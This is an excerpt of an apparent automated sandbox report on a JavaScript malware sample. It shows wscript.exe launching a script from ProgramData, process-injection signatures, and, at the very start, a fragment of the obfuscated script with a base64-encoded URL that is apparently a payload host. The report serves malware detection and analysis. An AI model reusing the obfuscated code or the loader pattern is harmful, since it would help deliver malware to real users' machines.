QQBZAFEAQgBwAEEARwA0AEEAYwB3AEEAPQAiADsAfQB9ACQAcwB3AGUAZQB0AGkAZQB3AGkAZgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBHAEEARwBFAEEAYgBBAEIAegBBAEcAawBBAFoAZwBCAHAAQQBHAFUAQQBjAGcAQQB1AEEASABBAEEAYQBBAEIAdgBBAEgAUQBBAGIAdwBCAHoAQQBBAD0APQAiADsA"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\wscript.exe" "C:\ProgramData\dedicative.js" Trochees Superscript melanthiumSarcoderma stitchedWhangam
parent_process	wscript.exe	martian_process	wscript "C:\ProgramData\dedicative.js" Trochees Superscript melanthiumSarcoderma stitchedWhangam

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 840 resumed a thread in remote process 2104
Process injection	Process 2104 resumed a thread in remote process 2264
NtResumeThread May 23, 2023, 9:37 a.m.	thread_handle: 0x0000030c suspend_count: 1 process_identifier: 2104	1	0	0
NtResumeThread May 23, 2023, 9:37 a.m.	thread_handle: 0x00000300 suspend_count: 1 process_identifier: 2264	1	0	0

The process wscript.exe wrote an executable file to disk which it then attempted to execute (2 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Inkmp.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All